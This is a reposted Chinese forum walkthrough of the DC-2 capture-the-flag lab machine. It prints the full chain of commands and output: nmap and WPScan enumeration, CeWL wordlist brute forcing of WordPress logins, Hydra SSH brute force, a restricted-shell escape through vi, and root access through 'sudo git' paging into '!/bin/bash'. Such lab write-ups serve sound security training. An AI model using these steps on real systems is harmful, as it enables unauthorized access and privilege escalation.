劲松待人生 发表于 2024-2-2 19:23:58

【DC渗透系列DC-2】

arp先扫

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
192.168.100.2300:0c:29:64:16:07       VMware, Inc.
192.168.100.254 00:50:56:ef:65:1b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 respondednmap扫

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n -p- 192.168.100.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-01 19:32 EST
Nmap scan report for 192.168.100.23
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp   openhttp    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp openssh   OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:64:16:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT   ADDRESS
1   1.37 ms 192.168.100.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds开了80的http端口和7744的ssh的端口
尝试浏览器访问
Hmm. We’re having trouble finding that site.

We can’t connect to the server at dc-2.

If that address is correct, here are three other things you can try:

    Try again later.
    Check your network connection.
    If you are connected but behind a firewall, check that Firefox has permission to access the Web.url跳到http://dc-2/
修改hosts文件

/etc/hosts(linux系统)
C:\Windows\System32\drivers\etc\hosts(Windows系统)
https://img-blog.csdnimg.cn/direct/e1888d68a3d447a1bdd7f08f9372de13.png
就好啦
https://img-blog.csdnimg.cn/direct/5a4bc24d80414de7a838ba390cc33903.png
找到flag1

https://img-blog.csdnimg.cn/direct/8c1f9a00c88445fa93b47bc1aafc6f16.png
发现是一个wordpress搭建的网站
https://img-blog.csdnimg.cn/direct/689336fc895545f6b0dfb8441d605dcd.png
flag中提示说要登录,找不到flag2就换个号登
dirsearch扫一下登陆界面

https://img-blog.csdnimg.cn/direct/dcd6af497be646f8863a6cdc2daa4e02.png
找到http://dc-2/wp-admin/
https://img-blog.csdnimg.cn/direct/76761c3a9939491bb41d6c988c95ea7a.png
访问成功
开始爆破
kali密码攻击工具——Cewl使用指南
┌──(root㉿kali)-[~/Desktop]
└─# cewl http://dc-2/ -w /root/Desktop/dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)https://img-blog.csdnimg.cn/direct/b9f6111b95f145ee988b27cbefe9603a.png
专门针对WordPress的工具WPScan
┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \      / /__ \ / ____|
          \ \/\/ /| |__) | (___   _____ _ _ __ ®
         \ \/\/ / |___/ \___ \ / __|/ _` | '_ \
            \/\/| |   ____) | (__| (_| | | | |
             \/\/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
                              
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

Updating the Database ...
Update completed.

[+] URL: http://dc-2/
[+] Started: Thu Feb1 20:12:07 2024

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|- http://codex.wordpress.org/XML-RPC_Pingback_API
|- https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
|- https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
|- https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
|- https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
|- https://www.iplocation.net/defend-wordpress-from-ddos
|- https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
|- http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
|- http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2024-01-16T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.5
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
|- http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00

User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
|Wp Json Api (Aggressive Detection)
|   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
|Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
|- http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
|Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Feb1 20:12:10 2024
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 16.619 KB
[+] Data Received: 21.289 MB
[+] Memory used: 177.188 MB
[+] Elapsed time: 00:00:03扫出三个用户名,放入user.txt
┌──(root㉿kali)-[~/Desktop]
└─# vim user.txt
                                                                                                                                                
┌──(root㉿kali)-[~/Desktop]
└─# cat user.txt                              
admin
jerry
tom开始爆破

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -U '/root/Desktop/user.txt'-P '/root/Desktop/dict.txt' https://img-blog.csdnimg.cn/direct/b24044e5bd154a20b0bd8d9068c9a277.png
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturientjerry登录page里面找到flag2

https://img-blog.csdnimg.cn/direct/43b888440c4943798a1ec46781f5eabc.png
提示我们;另一条路,账号名密码都有,想到前面的7744ssh端口爆破
同DC-9解法,海德拉

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L user.txt -P dict.txt ssh://192.168.100.23:7744
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-01 20:30:05
Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
attacking ssh://192.168.100.23:7744/
146.00 tries/min, 146 tries in 00:01h, 571 to do in 00:04h, 13 active
105.67 tries/min, 317 tries in 00:03h, 400 to do in 00:04h, 13 active
host: 192.168.100.23   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
Writing restore file because 2 final worker threads did not complete until end.
2 targets did not resolve or could not be connected
0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-01 20:36:40https://img-blog.csdnimg.cn/direct/f151ea0363a04d9182f1a2ca4a9f36cc.png
ssh尝试连接

ssh登录
使用less和vi可以查看
┌──(root㉿kali)-[~]
└─# ssh tom@192.168.100.23 -p 7744
The authenticity of host ':7744 (:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/)? yes
Warning: Permanently added ':7744' (ED25519) to the list of known hosts.
tom@192.168.100.23's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txtusr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ more flag3.txt
-rbash: more: command not found
tom@DC-2:~$
tom@DC-2:~$ less flag3.txthttps://img-blog.csdnimg.cn/direct/74e0c2440858457eaf1472d3825db1be.png
受限制shell(rbash-->相当于你的权限很低,很多命令用不了)的原因,命令type,cat,more,vim都无法查看
绕过rbash

法一:使用vi编辑进行绕过
(1)vi 文件名   //文件名自取
(2)输入:set shell=/bin/sh,然后回车
(3)输入:shell
(4)设置环境变量:export PATH=/usr/sbin:/usr/bin:/sbin:/bin
法二:BASH_CMDS设置shell
BASH_CMDS=/bin/bash   #设置了个x变量shell
x    #相当于执行shell
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/https://img-blog.csdnimg.cn/direct/0b64d7ebc69b4ecb887ec7ada0f7aed3.png
https://img-blog.csdnimg.cn/direct/ec414aaf51cf432aa0ff05b14bddba32.png
应该与jerrry有关,转到jerry目录,发现flag4
tom@DC-2:~$ ls
123dengluflag3.txttomusr
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ cd ..
tom@DC-2:/home$ ls
jerrytom
tom@DC-2:/home$ cd jerry
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ https://img-blog.csdnimg.cn/direct/963e0b4e640a4c92a45db00b34e9793c.png
还是提示git提权了
git提权

先转到jerry,密码前面找过了
https://img-blog.csdnimg.cn/direct/7be40e9a2170469eb26b6729233fd7fd.png
法一:
sudo -l//查询可用sudo命令果然有git
tom@DC-2:/home/jerry$ su jerry
Password:
jerry@DC-2:~$
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ sudo git help config //强制进入交互状态!/bin/bash(这里bash也可以换成sh) //打开一个root权限下的shelljerry@DC-2:~$ sudo git help config //强制进入交互状态
root@DC-2:/home/jerry# 法二:
sudo git -p help!/bin/bash(这里bash也可以换成sh)flag在root目录下

https://img-blog.csdnimg.cn/direct/29a8967d0aaa4b12a82d1e9ed7d6e912.png
结束!

来源:https://www.cnblogs.com/p1ggy/p/18002664
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: 【DC渗透系列DC-2】